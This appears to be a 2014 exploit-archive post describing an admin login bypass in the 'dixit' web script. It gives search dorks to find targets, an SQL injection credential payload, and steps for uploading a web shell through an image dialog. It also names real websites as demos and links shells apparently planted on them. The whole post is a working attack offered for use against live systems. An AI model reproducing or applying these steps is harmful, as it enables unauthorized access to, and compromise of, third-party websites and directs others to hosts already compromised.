facebook facebook twitter rss

dixit Admin Login Bypass

Author: wlhaan hacker , Published: 06-10-2014
#################################################################################

# exploit: dixit Admin Login Bypass

# Author: wlhaan hacker

# Vendor URL: http://www.dixit.net/

#dwonload script

http://fossies.org/linux/privat/dixit20b.zip

# googel dork


"powered by dixit"

or
allinurl:"admin.php?editid=1"


#################################################################################



==========================

Vulnerability Description



==================

PoC-Exploit

==================



http://<target>.com/admin.php



User:

'or'1'='1



pass:

'or'1'='1


#upload shell

admin.dialogs.images.php

http://<target>/admin/admin.dialogs.images.php

#your shell


http://<target>/admin/data/images/yourshell.php


# demo



http://www.provolmount.com/Site/admin.php

http://www.parquelemunantu.cl/admin.php

http://wtiersma.ruhosting.nl/speellieden/admin.php

http://www.gic-atletik.dk/admin.php

someshell
http://www.parquelemunantu.cl/data/images/99.php
http://www.provolmount.com/Site/data/images/ana.php.pjpeg




enjoy :)



have a nice time



#################################################################################



Discovered By : wlhaan hacker





https://twitter.com/waleedal3ybani



https://www.facebook.com/waleed.alaibani

Like us on Facebook :